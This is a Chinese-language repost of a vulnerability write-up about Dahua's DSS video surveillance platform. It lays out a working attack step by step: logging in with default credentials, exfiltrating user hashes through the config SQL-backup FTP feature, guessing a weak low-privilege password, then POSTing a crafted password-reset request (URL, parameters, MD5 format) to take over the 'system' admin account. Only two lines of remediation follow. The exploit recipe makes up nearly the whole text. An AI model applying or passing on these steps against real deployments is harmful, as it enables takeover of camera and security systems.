欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

大华DSS平台低权限账户越权直接修改system密码

程序员文章站 2022-06-23 12:04:38
大华DSS平台低权限账户越权直接修改system密码 前提:拥有config配置用户名密码 被测试DSS版本信息:V3.11.003.R.20150929.374164 前提:拥有con...

大华DSS平台低权限账户越权直接修改system密码

前提:拥有config配置用户名密码

被测试DSS版本信息:V3.11.003.R.20150929.374164

前提:拥有config配置用户名密码

一.取得所有用户名

1.进入config管理界面

地址:http://[IP]/config/user_toLoginPage.action

默认用户名admin密码123456

2.配置自动SQL备份FTP服务器

 

大华DSS平台低权限账户越权直接修改system密码

 

3.等待自动备份

4.从备份的SQL文件中获得所有账户的用户名,密码(MD5)

 

大华DSS平台低权限账户越权直接修改system密码

 

5. 测试账户弱口令,取得一个低权限账户

二.

1.web登录低权限账户(获得登录cookie)

 

大华DSS平台低权限账户越权直接修改system密码

 

2.POST提交强制修改密码的url(保持低权限账户的cookie)

我直接用的火狐在浏览器中提交的

 

大华DSS平台低权限账户越权直接修改system密码

 

http://【IP】/admin/user_updatePassword.action?nowTime=【时间戳】

POST信息:

noNeedCheckPassword=true

userBean.loginName=system 被改密码的用户名

userBean.id=1被改的用户ID(数据文件中获取)

userBean.newLoginPass=7e9038a26b85dc9b7d5089a1b1d7e00c 新密码MD5

MD5加密格式:

用户名:DSS:密码

(逆向JS所得)

三.完毕

经核实:所用的低权限账号是没有管理员权限的

 

大华DSS平台低权限账户越权直接修改system密码

 

 

大华DSS平台低权限账户越权直接修改system密码

 

解决方案:

弱口令和默认修改下可以简单解决

修改密码的提交增加权限认证